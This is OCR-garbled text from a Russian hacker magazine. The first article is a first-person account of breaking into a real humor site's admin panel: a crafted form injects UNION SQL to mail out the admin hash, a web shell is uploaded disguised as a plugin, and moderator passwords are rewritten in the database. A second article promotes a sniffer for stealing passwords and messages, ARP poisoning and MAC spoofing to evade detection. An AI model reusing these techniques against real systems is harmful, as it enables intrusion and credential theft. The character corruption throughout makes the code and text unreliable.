но, как обычно, писать его было лениво. 

Немного подумав, я вспомнил об одной особенности заголов- 
ка «То:» при отправке мыла. Итак, в этом поле можно указать 
координаты получателя в формате «Имя фамилия ЬІІІуй 
тісговоЛ.сопп», и е-таііуспешноуйдетадресату! На основе 
этой информации я придумал простенький эксплойт: 

<іогт асОіоп= "Ыскр : / /капіЪака . ги/сопРасД . 
ркр" теЦ]гос1= " РОЗТ" > 

<іприО пате= " зепсІ-сопОасРиз " ѵа1ие= " 1 " /> 
<іприО пате= "Ъосіу " ѵа1ие="ТЬ.ізсІ із а ОезО 
етаіі ігот РапіЬаРа =) "/> 

<іприР пате= " етаі1_зепс!" ѵа1ие= "тоу_етаі1@ 
дтаіі . сот" /> 

<іприО пате= " аикЪ.ог_пате " ѵа1ие= "ггшхаіака" /> 
<іприк пате=" зиЬдеск" ѵа1ие="Меда ЗиЪдеск" / 
хЪг/ > 

<іприк зіге=200 пате= " сопкаск_регзоп" 
ѵа1ие=" -999 ипіоп зеіеск 1 , сопсак (изег_ 
раззчлгогсі, ' 1 , изег_1одіппате , ' <тоу_етаі1@ 
дтаіі. сош> , ) ігот е107_изег хкЬеге изег_ 

ій=1/*"/> 

<Ъг/хіприк куре= " зиЪтік " ѵа1ие="ок" /> 
</іогт> 

Нотаккакна сервере был в кл юч ен тадіс_дио ѣ ез_дрс, то 
этот вариант сплойта не прокатил. Нужно было модифициро- 
вать все символы, находящиеся в кавычках, в сЬаг. Для этого 
я написал простой скрипт: 




> ѵѵагпіпд 

Вся описанная инфор- 
мация предоставляет- 
ся исключительно 
кознакомлению 
и размышлению. Ни- 
какая часть данного 
материала не может 
быть использована 
во вред, в обратном 
случае, ни автор, ни 
редакция не несут ка- 
кой-либо ответствен- 
ности за возможный 
ущерб, причиненный 
материалами статьи. 



іі ( $зд1 -> сіЪ_Зе1еск ( "изег" , 

"изег_паше ,изег_ешаі1 " , $диегу . " ЬІМІТ 1" ) ) 

{ 

$гсж = $зд1 -> с!Ъ_Рекс]т() ; 

$зепс!_ко = $гоѵ7 [ 'изег_ешаі1' ] ; 

$зепсМ:о_пате = $гом[ 'изег_пате' ] ; 

} 

еізе 

{ 

$зепсі_ко = ЗІТЕАБМШЕМАІЬ; 

$зепсі_ко_пате = АБМШ; 

} 

Сложностей было даже две. 

Первая: е 1 07 никогда, ни при каких обстоятельствах, не выве- 
дет сообщения об ошибке в 5СН_-запросе. 

Вторая: при верно составленной 50І_-квере мыло, которое 
ты отсылаешь в форме контакта с администрацией, уйдет на 



<?ркр 

$зутЬо1з= * <тоу_етаі1@дтаі1 . сот> ' ; 
іог ($і=0 ; $і<зкг1еп ($зіке) ; $і++) 

{ 

$і ! = ( зкгіеп ( $зіке) -1 ) ? ргіпк $агг[зиЬзк 
г($зіке,$і,1)].',' : ргіпк $агг [ зиЬзкг ( $зіке 

#$1,1) П ; 

} 

?> 

В результате в поле сопіасі __регзоп получилось что-то 
вроде ЭТОГО: 

ѵа1ие="-999 ипіоп зеіеск изег_ 
раззѵгогсі, сопсак (изег_раззчлгогс1, скаг ( 32 ) ,изег_ 
1одіппате,скаг (32,60,109,111,121,95,121,97 
,119,105,107,64,98,107,46,114,117,62) ) кгот 
е!07_изег ѵіЬеге изег_іс!=1/ * " 
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Атак выглядит ШрсІ.сопі 1 баша! 



Послеуспешного сабмита я увидел мессагу от е 1 0 7 : «Уоиг теззаде маз 
зиссезкиііу зепѣ !», а также новое мыло в своем ящике, где в поле 
«То:» были хеш и логин админа ІапіЬаІа.ги : 



"То: "30е50569с19а3сі6і73ес5075754сі43сі07 Кеп" <шоу_ешаі1@ 
дтаіі . сот> " 



Для успешного входа в админку портала мнежизненно необходимо было 
расшифровать полученный хеш, так как копаться в исходных кодах е 1 07, от- 
вечающихза авторизацию пользователей, опять не позволялата же лень. 

Я полез на всеми любимый сервис по расшифровке ппсіб-хешей ріаіп- 
іехі . іпко, который, к глубочайшему сожалению, не смогмне ничем 
помочь. Не отчаиваясь, я просмотрел список всех юзеров та нибаты с помо- 
щью кЛдУ/кэщЬакшМе!!^ Приветливый 

скрипт подсказал мне, что на портале есть и второй админ с ником Зеіепа 
и ІВ=2, к которому я и применил свой мегасплойт. Новый хеш е10а<3с39 
49Ъа59аЪЪе56е057Е20Е883е ріаіп-іехѣ . іпко расшифровал уже с 
большей охотой, в результате чего я и оказался в админке ЫПрУАапіЬаіа. 
ги/еі 07 абтіп/абтіп.рЬр с данными ЗеІепаП 23456 :). 



ВКАВАИ! 

Далее было бы логично залить шелл. Чем я тут же и занялся! Потыкав 
немного по различным пунктам админки и убедившись, что любой аплоад 
файла с расширениями .ріір, .рЫтІ режется на корню, я случайно 
наткнулся на интересную формутогоже аплода вуправлении плагинами. 
Эта форма поддерживает загрузку новых плагинов, запакованных в 2 Ір или 
іаг.дг. Следуя этой логике, я запаковал свой шелл в 2 Ір и успешно загрузил 
его, в результате чего получил доступ к серваку по адресу ЬЛрУЛапіЬаІа. 
ги/е 1 07 р[идіпз/404.рІір?5І:ц[сЬед :). Немного пошастав по серваку, я нашел 
сам башорг в /ехрогі/ЬозІз/ЪазЪ. огд . ги/сіоситепіз, где в даль- 
нейшем и остался для изучения всей подноготной баша. 
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Админка баша 



$скеск = $сПэ->деі_гезиііз ( " зеіесі ісі, Іодіп, 
раззжэгсі ігот тосіегаіогз хікеге тсі5 (Іодіп) = 

СООКІЕ [ "рапсіа" ] . " 1 апсі раззѵ\гогс1= 

СООКІЕ [ "корапсіа" ] , АККАУ_А) ; 

іі ( ! етріу ( $сЬ.еск) ) { 

$тосіегаіог_ісі = $скеск [0] ['ісЗ.']; 

зеісоокіе ( "рапсіа" , $_СООКІЕ [ "рапсіа" ] , $ііте+3200) ; 
зеісоокіе ( "корапсіа" , $_СООКІЕ [ "корапсіа" ] , 
$ііте+3200) ; 

$сіЪ->диегу ( "ирсіаіе тосіегаіогз зек 1азізееп_аі=поѵ\г ( ) 
ѵіЬеге іс!=$тосіегаіог_ісі'' ) ; 

$зтагіу->аззідп ( "МОВЕКАТОК_ІБ" , $тос!егаіог_ісі) ; 

} еізе { 

Ьеасіег ( $іаііоѵег . " іодіп" ) ; 

} 

} еізе { 

іі ( $гедиезі_асііоп != 'іодіп') 
кеасіег ( $іаііоѵег . " іодіп" ) ; 

} 



{ 



сазе ' іодіп ' : 

іі (іззеі ( $_РОЗТ [' іодіп '] ) 

&& іззеі ( $_Р08Т [ ' раззѵлэгсі ' ] ) ] 

$1одіп = $_РОЗТ [ ' іодіп ' ] ; 

$раззѵ\гогс1 = $_Р08Т [ 'раззтлгогсН ] ; 

$скеск = $сіЬ->деі_гезиііз ( " зеіесі іодіп, раззѵгогсі 
ігогп шосіегаіогз ѵітеге 1одіп= ' $1одіп' апсі раззѵгогсі=РА88ѴГО 
КБ ( ' $раззѵ\ЮГСІ' ) " , АККАУ_А) ; 
іі (! етріу ( $скеск) ) { 

зеісоокіе ( "рапсіа" , тсі5 ( $1одіп) , $ііте+3200) ; 
зеісоокіе ( "корапсіа" , $сЬ.еск[0] [ ' раззѵлэгсі ' ] , 
$ііте+3200) ; 
кеасіег ( $іаііоѵег) ; 



} 



И ГЛУБЖЕ! 

Первым каталогом, заинтересовавшим мое внимание, был абтзѣаѣ. 
Перейдя по адресу ЬЛрУ/ЬаБІі.огд.ги/асІтБІаі я увидел незащищенную 
паролем статистикузааппрувленных и перелопаченных модераторами 
баша цитат! Какстало видно из статистики, наиболее активным модером 
является щіп :). Следующим каталогом для изучения стал арр42. Поэтому 
адресу находится админга русского башорга. Но чтобы попасть в нее, нужно 
было изучить механизм авторизации в арр42 / іпсіех . рЬр. Меня заинтри- 
говал следующий КОД: 

іі (іззеі ($_СООКІЕ [ "рапсіа" ] ) апсііззеі($_ 

СООКІЕ [ "корапсіа" ] ) ) { 



} 

$іешріаіе = ' асітіп_1одіп . ірі ' ; 

Ьгеак; 

Отсюда следовало: 

1. Логины и пароли модераторов хранятся втаблице тосіегаіюгз. Поля 
Іодіп и раззжогсі, соответственно. 

2. Пароли модераторов зашифрованы встроенной функцией тузді 

раззмокро . 

3. Если существуют куки со следующим содержанием — $_СООК1Е [ "рапсі 
а"] =тсі5 ( ' по гин_модератор а ' ) и $_СООКІЕ [ "корапсіа "] = РАЗ ЕМОК 
Б ( ' пароль_модератора ' ) ,тоты оказываешься успешно залогиненным 
в админку. 



► 058 
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Необходимо было найти доступы к базе данных. Над ней предстояло немно- 
го поизвращаться, дабы не расшифровывать плузріб-хеши модеров. 

Я залил менеджер БД П5Т Музці в ту же папку, где у меня лежал шелл, и 
успешно проник в базу башорга с помощью урл ЫПрѴ/іапіЬаіа.ги/еІ 07 
рІиоіпз/здІ.рЬр . Данные для доступа к БД лежали в корне башорга в файле 
_сопкід. іпс.рЬр-. 

$сПэ = п еѵ7 езЗОШтуздІ ( 1 кгіѵейко 1 , 1 ВіатопйІз№іЬгеакаЬ1е 
1 , 1 ЬазЪ.огд_ге!асВогес1 ' , 'ІосаИгозО' ) ; (езЗОЬ — не правда 
ли, знакомое название? ) 

Зайдя в ЬазЬогд_гекасѣоге<3 в табл и цу тосЗега ѣ огз, я увидел все 
данные модеров баша в формате іб, логин, имя, пароль и последний заход в 
админку (полюбуйся на скриншот). 

Далее я успешно провел запрос к БД, позволивший мне зайти в админку 
под своим паролем: 

ІІРБАТЕ тойегаВогз ЗЕТ раззѵгогй=РАЗЗѴГОКХ> ( ' Іора' ) ШЕКЕ 

После логина в админку с данными асЗтіпізІгаІог : Іора я изменил 
обратно пароль ДаркРайдера: 

ІІРБАТЕ шойегаРогз ЗЕТ раззжэгй= ' *08СБЕ192357ВЗСАВ08В29Е 
1636Е78Е0116452Е7 9 ' ШЕКЕ ій=1; 

А также подставил значение *08СОЕ192357ВЗСАВ08В29Е1636Р7 
8Е0116452Е79 в кукис корапсіа с помощью своей любимой Оперы 
(Инструменты -> Дополнительно Соокіев). На этом, собственно, 
моя цель и была достигнута. 



Н ВО ИМЯ ДОБРА 

Я не стал наносить никакого вреда своемулюбимому ресурсу, а лишь 
немного походил по админке и посмотрел на ЬавЬ.ога.ги изнутри. Все- 
таки работа модераторов такого сайта огромна. Итебехочудатьсоветна 
будущее: никогда не разрушай то, что приносит радость и веселье людям. А 
через несколько дней все баги были закрыты без моего вмешательства, за 
что честь, хвала и ящик пива админам! ИИ 



Статистика зааппрувленных цитат 




Вход в админку баша 







7 




Ъй8Ь.ог&.пі изнутри 










Пвм 








аайти 
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КРИС КАСПЕРСКИ 



СНИФИНГ 



Інифер д ля хакера — ка к катана для самурая. Вот только самураев нын- 
е много, а достойного оружия — мало. Плохо, когда снифер отказывается і 

ііяшгл ш*. ;г - — леа »*№ г 

аботать, но е ще х уже ? ког дао^работает неправильно. в упо]э н< 

юктно его дею^щэует, те^^ыш^оли и другую жиз 
ормацию. Но сейчас волноваться не о чем — Іпіегсеріег ь 



идит трафик или неко 



ебе в помощь! 



ШТЕВСЕРТЕВ — РАЗНЮХАЕТ ВСЕ! 





























^-2 















Н В НАШЕМ ПОЛКУ ПРИБЫЛО! 

Поздравляем! Зарелизен новый снифер 0х4553-1гйегсер1ег отечест- 
венной разработки, распространяемый на бесплатной основе, хоть и 
без исходных текстов. К счастью, этот минус полностью перекрывается 
богатым функционалом, обгоняющим конкурентов по всем статьям. И 
это — с первого релиза! В последующих версиях планируется ввести 
в строй множество соблазнительных фич, выводящих конкуренцию в 
плоскость вертикального предела с пол ным отрывом от земли. Что ж, 
как говорится, поживем — увидим, а пока разберемся с тем, что уже 
есть. 



Н ЧТОВСНИФЕРЕ ТВОЕМ 

Краткая характеристика: характер — нордический, тьфу, какой к черту 
характер? Интерфейс! А интерфейсу нас графический, можно даже сказать, 
интуитивно понятный, позволяющий хачить сразу же после запуска без 
чтения мануалов. Для начинающиххакеров — самоето! Конечно, парни 
поопытнее предпочитают командную строку с кучей «магических» ключей 
и строгое разделение обязанностей. Они мыслят так: пустьу нас будет куча 
мелкихутилит, каждая из которых делает что-то одно. Кто-то грабиттрафик, 
кто-то его декодирует, кто-то выдергивает из декодированного трафика па- 
роли, а кто-то... короче, ІІЫІХ-ѵѵау в чистом виде. Снифер 0х4553-1піегсеріег 
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Снифер — русский, а мануал — английский. Для затяжного раскуривания 




> \ПІО 

Конкуренты: 

Саіп — бесплатный, 
отлично работает, но 
в плане 

перехвата данных 
существенно уступает 
0x4553- Іпіегсеріег’у 
по функционалу. 

Еиегсар + сізпі^ — оба 

древние, неудобные, 
да еще и с кучей глю- 
ков и багов. В топку! 

біѵе те *оо + ІатозоК 
пеігезісіеп* — оба 

платные и качество 
сомнительное. 



идет по пути интеграции (типа швейцарский нож«все в одном»), испове- 
дуя концепции ѴѴІпбоѵѵз, что, впрочем, неудивительно, поскольку он на 
ѴѴІпбоѵѵз и ориентирован. 

Грабежтрафика реализован через популярный пакет РСАР, перенесенный 
из мира ІІЫІХ'а. Многие сниферы устанавливаютѴѴіпРСАР в систему, жес- 
токо прописывая его на диске и в реестре. Это, в конечном счете, приводит к 
конфликтам со многими приложениями, возникающим даже при незапу- 
щенном снифере. В этом плане 0x4553-1 п^егсеріег предельно корректен. 
Библиотеки ѵѵрсар.сШ и раскеЫІІ он деловито носитза собой, динамически 
подгружая их из своего рабочего каталога строго по необходимости. А пото- 
му — операционная система остается в девственной целости. 

Кстати, операционная система можетбыть любой из линейки І\ІТ — ѴѴ2К, 

ХР, 52 КЗ и, по заявлением разработчика, — Виста. Я третировал, тьфу, тес- 
тировал снифер на 52КЗ — полет нормальный. Висты под рукой нет, прове- 
рять не на чем, хотя по слухам, циркулирующим на форумах, у ѴѴІпРСАР'а с 
ней какие-то терки, так что нефакт, что все заведется. Впрочем, Виста на 
хакерских машинах — явление редкое, если не сказать, исключительное. 

К тому же, если копнуть вглубь, 0x4553-1 п1;егсер1;ег не ограничивается 
одной лишь ѴѴІпсіоѵѵб. Он поддерживает возможность удаленного захвата 
трафика посредством РРСАР-демона, обычноустанавливаемого на шлюз 
локальной сети и грабящего весьтрафик на входе/выводе во «внешний» 
мир. Поскольку шлюзы нередко вращаются под управлением Ыпих’а или 
хВ50,то НРСАР-демон оказывается весьма полезен. Без него снифер 
превращается в игрушку, которой много не награбишь, особенно в сетях 
с интеллектуальными машрутизаторами, доставляющими пакеты только 
тем узлам, которым они непосредственно адресованы (0x4553-1 піегсеріег 
способен грабить трафикдаже втакихусловиях, но об этом мы поговорим 
чуть позже). 

Сниферы первых поколений работали втак называемом «сыром» режиме 
(гаѵѵ тобе). Они захватывали весь (или не весь) пролетающий мимо них 
трафик, который потом приходилось растягивать на пакеты, сортируя их по 
номерам портов/типам протоколов, а затем еще и декодировать содержи- 
мое сучетом формата конкретного протокола. 




Форум пользователей 0x4553-1 піегсеріег'а 



0х4553-Іпіегсер1;ег нетолько отображает награбленное в удобочитаемом 
виде, но и способен «выхватывать» пароли (или иххэши) из следующих 
протоколов: ІСО, ІНС, АІМ, РТР, ІМАР, РОРЗ, 5МТР, ЮАР, ВЫС, 50СК5, 
НТТР, ЫІМТР, СѴ5, ТЕБЫ ЕТ, МРА, ОС++, ѴІ\ІС, МУ5СЕ, ОНАСБЕ. 

Пароли, посланные открытым текстом (они же «ріаіп»), готовы к использо- 
ванию сразу после перехвата. Стоп! Нельзя понимать написанное букваль- 
но. Конечно же, не сразу после перехвата, а только после завершения теку- 
щей сессии легальным пользователем-жертвой, так как повторный вход в 
активную сессию в 99% случаев блокируется. С хэш-суммами дело обстоит 
намного хуже, и без взлома (обычно осуществляемого методом перебора) 
тут не обойтись. Однако, у большинства протоколов криптостойкость неве- 
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— официальным сайт 
программы, откуда 
всегда можно утянуть 
самую свежую версию 
вместе с документа- 
цией. 

• соіазой.сот/ 
сіоѵѵп ІоасІ/а гр йоосі 
агр зрообпд агр 
роівопіпд аІЧаск 

во Іиііоп ѵѵі1:И сарза. 
рИр — разъяснение 
сути АРР-роізоп 
атаки, реализуемой 
0x4553-1 гйегсеріег’ом 
в качестве неболышо- 
годовеска косновно- 
му функционалу. 

• еп.ѵѵікіресііа. 
огд/ѵѵікі/АРР зрообпд 

— АРР-атаки наѵѵікі. 



лика, а современные компьютеры (особенно, объеденные в 
Ьоіпеі’ы) — чрезвычайно мощны. Достаточно воспользоваться 
одной из хэш-ломалок (некоторые из которых можно скачать 
с ѵѵѵѵѵѵ.іпзісіерго.сот і и запастисьтерпением. По понятным 
причинам (нельзя объять необъятное), хэш-ломалки в состав 
0x4553-1 піегсеріег не входят. 

Снифер поддерживает множество популярных мессенджеров, 
отображая диалог в удобочитаемом виде. В настоящий момент 
«перевариваются» следующие протоколы: ІСО, АІ М , ЗАВ В ЕР, 
УАНОО, М5Ы, 6А01І-6А01І, ІРС и МРА. Причем, в отличие 
отзарубежных сниферов, работающих преимущественно с 
АЫ5І-текстом, 0x4553-1 піегсеріег выгодно отличается тем, 
что поддерживает кодировки 1ЯР8\1ЯР1 6\РТР, использу- 
емые для передачи национальных символов (в том числе и 
кириллических). Мы проверили: 0x4553-1 піегсеріег корректно 
отображает не только русские, но даже китайские письмена 
и арабскую вязь. А вот с некоторыми европейскими языками 
замеченытрудности, поскольку они используют АЫ5І со своей 
локалью (читай — кодовой страницей), которая не естьуникод. 
В попытке вывода на экран притекущей кириллической или 
американской л окал и та кая мешанина получается! 



Но это не проблема 0x4553-1 п1;егсер1:ег’а. Если в сети находят- 
ся два человека, общающиеся не через уникодовые мессен- 
джеры (или через уникодовые, но с отличной от нас локалью), 
то мы должны через «региональные настройки» выбрать ту же 
самую локаль, что у них, открыть в «Блокноте» текст, награб- 
ленный 0x4553-1 п1;егсер1:ег’ом , и сохранитьего какуникод. 
После чего можно возвращать русскую локаль на место и 
открывать файл чем угодно (с поддержкой уникода). В частнос- 
ти, РАР позволяетпросматриватьуникодовыефайлы по <РЗ>, 
но для их редактирования нужноустановитьспециальный 
плагин. Кстати, китайские/японские неуникодовые клиенты 
также используют АЫ5І, ну это, конечно, не совсем АЫ5І, но с 
точки зрения снифера — выглядит именно так. Чтобы прочесть 
захваченный текст, приходится опять-таки перенастраивать 
операционную систему на китайскую/японскую локаль. 

Тут, кстати говоря, самое время (и место) сказать, что протокол 
и клиент— не одно итоже. ѲТаІк, например, использует 
ЗАВВЕР-протокол, и хотя отсутствует в данном списке, замеча- 
тельно «захватывается» снифером. Клиентов много. Намного 
больше, чем протоколов. Некоторые клиенты (та же Миранда) 



Грабим самих себя 



Снифер полезен не только для перехвата чужих данных, но и для 
анализа циркулирующего локального трафика. С его помощью можно 
понять, кто и куда ломится с нашей машины, например, какие данные 
передает система при входе в Сеть. Аналогичным образом вылавли- 
ваются спам-боты (особенно, при сниффе со шлюза) — в логе друг за 
другом идет отображение перехваченных писем. Шлюзовой перехват 
в этом плане хорош тем, что его крайне трудно замаскировать. В то 
же время, если зловредная программа запущена на одной машине со 
снифером, она может ему весьма эффективно противостоять. Потому, 
когда снифер говорит, что в «Багдаде все спокойно», вовсе не факт, что 
нас уже не поимели. 



Висим? Нет, не ви- 
сим — видишь, дис- 
ком дрыгает! 

У 0х4553-ІШегсері:ег есть еще одна полезная фича. Саіп и ШазоЙ зпйТег 
при загрузке рсар-дампов «подвисают» на время их обработки, не 
предоставляя никаких рычагов для управления процессом и ничего 
не отображая на экране. 0х4553-ІгЦегсері:ег показывает текущий 
статус загрузки в пакетах/процентах, выводя данные параллельно 
с их загрузкой. Можно созерцать, а можно переключиться в другой 
режим, занявшись делом, или просто прерывать загрузку дампа, если 
нам уже понятно, что ничего интересного все равно нет. 
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<итайская мессага, посланная в АЫЭІ-формате, отображаемая 
в системе с установленной китайской локалью (сверху). И тот 
же самый текст, отображаемый в системе с Кирилл и ческоі^И 
локалью 



>мая 

° т 



поддерживают целый легион протоколов и потомууспешность 
перехвата зависит оттого, по какому протоколутреплется 
конкретный пользователь. Традиционная почта (в смысле, 
5МТР/Р0РЗ) также захватывается и декодируется снифером. К 
ѴѴЕВ-интерфейсу сказанное не относится и потому его прихо- 
дится разгребать руками, лапами и хвостом. 

Кстати, о птичках. Для любителей поработать руками в 
0х4553-Іпіегсеріег предусмотрен старый добрый «сырой» 
режим, отображающий трафик в Ьех-виде (слева цифры, 
справа — символы). Но прибегать к нему обычно нет нужды, 
поскольку сырых граберов — отхвоста и больше, и в этом 
плане 0х4553-Іпіегсеріег им не конкурент. То есть, конкурент, 
конечно, но все-таки он ориентирован на другой классзадач. 

В арсенале 0х4553-Іпіегсеріег имеется множество убийствен- 
ныхтехнологий. Чего стоиттолько один «еХіхете тобе». В 
этом режимеснифер грабит весьтрафик, определяятипы про- 
токолов не по номерам портов, которые могутбыть изменены, 
а по их содержимому. Естественно, поскольку искусственный 
интеллектеще не изобретен, возможны ошибки — как пози- 
тивные (захват «левых» пакетов), так и негативные (пропуск 
полезных пакетов). Достаточно выловить лишь несколько 
пакетов, чтобы определить порт, зная который, можно грабить 
трафик и в обычном режиме. Эта фича полезна для выявле- 
ния Ргоху- и ЕТР-серверов. Остальные сервисы работаютс 
более или менее предсказуемыми портами. Р0РЗ/5МТР на 
нестандартных портах встречаются крайне редко, а вот при- 
ватный РТР на нестандартном порте (типа, чтобы не засекли 
и не ломились всякие левые личности) — явление вполне 
нормальное. 

Награбленныйтрафикможетбыть сохранен в рсар-формате 
(стандарт де-факто среди сниферов) и подвергнут дальней- 
шему анализу в утилитах, извлекающих информацию. Как 
правило, это взломщики паролей, работающие с протоколами 
неизвестными 0x4553- Іпіегсеріег’у. Ктаковым относятся 
многие беспроводные протоколы и нестандартные протоко- 
лы, реализованные неизвестно кем и неизвестно для чего. В 
любом случае, возможность экспорта трафика в общеприня- 
тый формат не помешает, тем более что 0х4553-1піегсеріегс 
радостью импортирует в себя рсар-дампы, собранные другими 
сниферами. Последние ловко грабяттрафик, но незнают, чего 
такого хорошего с ним можно сделать (где искать пароли, как 
декодировать сообщения мессенджеров ит.д.). 

Помимо чисто сниферных функций, 0х4553-1піегсеріег 
располагает рядом весьма соблазнительных фич. Начнем 
с банального обнаружения узлов, которое в данном случае 
осуществляется отнюдь нетупым сканированием и перебором 
ІР-адресов (даже м-а-а-аленькая локальная сеть «класса С» 
сканируется ну оченьдолго, плюс на узле могут быть закрыты 




В первом релизе имеются недоделанные функции в стиле «ипбег 
сопзігисііоп» 




все порты и запрещен ответ на ріпд). 0x4553-1 піегсеріег 
посылает широковещательный АРР-запрос, требуя, чтобы все 
узлы, которые его получили, сообщили свои ІР-адреса. Быстро 
и эффективно. Это вполне легальная операция, на которую 
системы обнаружения вторжений смотрят сквозь пальцы. Ну, 
разве что хакер не начнет отнечего делать слать запросы один 
за другим, что выглядит весьма подозрительно. 

Причем, 0х4553-1піегсер1;егспособен выявлять остальные 
сниферы, многие из которых с формальной точки зрения 
представляют собой брандмауэры ил и те же самые системы 
обнаружения вторжений. Воттакие, с позволения сказать, 
«честные» сниферы в локальной сети, высаживающие 
администратора на измену и делающие эту фичу совершенно 
бесполезной для него. Вменяемые злоумышленники давно 
используют стел с-сниферы, требующие небольшой доработки 
сетевой карты, чтобы она не реагировала на пакеты, которые 
предназначены не ей. Простейший способ заткнуть ей рот 
— перерезать передающий провод в витой паре, правда, бу- 
дучи запущенным на такой карте, 0x4553- Іпіегсеріег потеряет 
добрую половину функционала. А вот для хакеров функция 
обнаружения сниферов — самое то. Даже если это не система 
защиты, а просто человек-со-снифером, — он явно не ламер 
и лучше его узел нетрогать, а то ведь можно и огрести. Еще 
неизвестно, кто круче окажется — он или мы. 
Интегрированный перепрограмматор МАС-адресов — вещь 
полезная, хотя и без нее имеется куча утилитаналогичного на- 
значения, втом числе и входящих в состав большинства (если 




> СІѴСІ 

На диске ищи 
последний (и 
бесплатный) релиз 
0х4553-Іпіегсеріег’а! 
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не всех) дистрибутивов Ыпих’а и хВ5Б. В крупных локальных 
сетях идентификация хакера, как правило, осуществляет- 
ся по номеру порта марштутизатора, в который воткнут его 
сетевой кабель. Причем, специальная сторожевая программа 
следит за соответствием МАС-адресов и номеров физических 
портов маршрутизатора, а потому — от возмездия неуйти. 

Если только не добраться до маршрутизатора и на время 
атаки не переткнуть соседние кабели, поменяв их местами. А 
вот в маленьких локальных сетях (особенно, с приходящими 
администраторами) ситуация совершенно иная. Огромное 
количествотаких«администраторов» о МАС-адресахтолько 
слышали, нотак и не врубились, зачем они нужны, ведьу нас 
есть замечательный логв котором записаны ІР! 
Администраторы поумнее уста на вливают разнообразные 
системы обнаружения вторжений, отображающие МАС-ад- 
реса потенциальных нарушителей и если хакер изменитсвой 
МАО, то найти его будет весьма проблематично. Хотя не стоит 
забывать, что чемумнее администратор, тем более глупым он 
стремится выглядеть. А зачем ему понты кидать? Зато когда 
нагружают непрофильной работой, то отмазка: «не знаю, 
неумею, и вообще, совсем не втеме» — работаетжелезно. 
Кстати, тоже самое относится кхакерам. Чтобы хакерство- 
вать, оставаясь при этом на свободе, достаточно прикинуться 
лаптем или поленом, прущимся отѴізиаІ Вавіс’а и шепотом 
называющим <АЕТ-СТРЕ-БЕЕ> хакерской комбинацией. 

В ЗАКЛЮЧЕНИЕ 

Без ложной скромности 0x4553-1 піегсеріег претендует на роль 
одного из лучшихсниферов. Он ориентирован на молодое 
поколение хакеров, влюбленных в графический интерфейс 
и шарахающихся от командной строки, какладан отдьявола. 
Консольные сниферы их не удовлетворяют, а необходимость 
обрабатывать награбленный трафик кучей различных утилит 
— просто бесит. Что ж, спрос рождает предложение и желаю- 
щие обрящутто, чтотакдавно и безуспешно искали. 

Аесли возникнут какие-то непонятки —то РБТМ. Курим ману- 
ал путем нажатия <Е1 > или открываем справку, находящуюся в 
файле Ііеір . сЪт. Он написан на международном хакерском 
языке. Английском, в смысле. 

Ну а с графического интерфейса и до командной строки неда- 
леко. Главное — это понять основные концепции, врубиться 
втему, втянувшись в первые эксперименты (а эксперименти- 
ровать с 0x4553- Іпіегсеріегснифером можно очччченьдолго). 
Когда же его функционала и гибкости будет недоставать — тог- 
да и только тогда следует всерьез задумываться об установке 
Ыпих/хВЗБ и доработке имеющихся сниферов, распространя- 
емых в исходных текстах. □С 



Основные преимущества 
0Х4553-Іпі:егсерГег’а 

• Максимально большое (среди существующих аналогов) количество поддержи- 
ваемых сервисов, у которых перехватываются пароли в открытом виде или их 
хэш-суммы. 

• Максимальное (среди существующих аналогов) количество поддерживаемых 
мессенджеров, у которых перехватываются сообщения и отображаются в удобо- 
читаемом виде. 

• Продвинутая обработка ОЗСАК-протокола (используемого ІССДАІМ-мессенд- 
жерами) , учитывающая ряд тонких особенностей, приводящих к потере сообще- 
ний у большинства конкурирующих сниферов (и, в частности, іЛазоЙ Іт ЗпіКег) . 

• Для ІСО\АІМ\іАВВЕК предусмотрен декодингІІТР8\ІІТР16\КТР сообщений, 
что полезно при перехвате национальных сообщений (читай — написанных не 
по-английски). 

• Зарубежные МЗИ\САЭи-САВІІ\УАНОО захватываются как есть, без декодинга, 
поскольку идут в АИ 3 1 . 

• 100% перехват сообщений от таіі.ги а§ещ (зарубежные сниферы его вообще не 
хавают, поскольку не знают, что есть на российских просторах такой зверь) . 

• Поддерживается сохранение перехваченных РОРЗ/ЗМТР-сообщений в .еті 
формате, что позволяет одним щелчком мыши импортировать их в любой почто- 
вый клиент (ОіЛІоокРхргезз, ТЪе Ваі!). 

• Качество обработки протоколов на порядок выше, чем у конкурирующих 
сниферов: там, где Саіп или Екегсар ничего не видит, 0х4553-ІШ:егсері:ег свободно 
«вытягивает» пароль. 

• Поддерживается уникальный режим «экстремального» сканирования (еХігете 
тобе), при котором сниферу достаточно указать целевой протокол без специ- 
фицирования порта — ОхбББЗ-Ітегсеріег будет просматривать весь трафик, 
автоматически «вылавливая» пакеты, относящиеся к данному протоколу, путем 
анализа их содержимого. 

• Под держивается удаленный грабеж трафика через КРСАР демона, устанавливае- 
мого на Ілпих/хВЗЭ или ѴѴіпбоѵѵз-узлах (предпочтительнее всего — на шлюзе) . 

• Награбленный трафик может быть сохранен в популярном рсар-формате, «пе- 
ревариваемом» многими сторонними анализаторами. 

• Поддержка СКЕ\РРРОЕ\ѴѴІРІ инкапсуляций. 

• Загрузка рсар-дампов, полученных другим снифером, с их последующей обра- 
боткой на предмет отображения содержимого протоколов в удобочитаемом виде, 
поиск паролей и т.д. 

• Прочие полезные функции, напрямую не относящиеся к снифингу, но косвенно 
связанные с ним: 

АКР ЗСАИ — поиск узлов в выбранной подсети, осуществляемый широковеща- 
тельной посылкой АКР-запросов (легальный прием); 

ЭНСР ЭІЗСОѴЕКУ — поиск ЭНСР-серверов (уникальная возможность, отсутству- 
ющая у конкурирующих сниферов) . Знание адреса ЭНСР-сервера открывает путь 
ко многим видам атак, в том числе связанным и с перехватом трафика в сетях с 
интеллектуальными маршрутизаторами; 

РКОМІЗСІЮИЗ ЗСАИ — поиск узлов, работающих в «неразборчивом» режиме, то 
есть принимающих все пролетающие мимо них пакеты, даже если они адресованы 
другим узлам. Это (теоретически) позволяет выявить активные сниферы, а прак- 
тически — дает множество ложных срабатываний, конфликтуя с брандмауэрами и 
другим программным обеспечением, как правило, предназначенным для выявле- 
ния атак и не афиширующим тот факт, что захватывают посторонний трафик. 

• Реализован встроенный «перепрограмматор» МАС-адресов сетевых карт, 
воткнутых в локальную машину, что в некоторой степени затрудняет поиск 
злоумышленника. Однако не стоит переоценивать его возможности, поскольку 
администратор может со 100% надежностью определить отправителя «зловред- 
ных» пакетов по порту маршрутизатора, куда воткнут кабель, ведущий к сетевой 
карте хакера. Хотя об этом трюке осведомлены далеко не все администраторы и 
штатные средства порты маршрутизатора не отображают. 

• Интегрирован модуль для атаки типа «АКР РОІЗОИ», выявляемой многими 
системами обнаружения вторжений, а потому реально работающей только в 
незащищенных локальных сетях. 

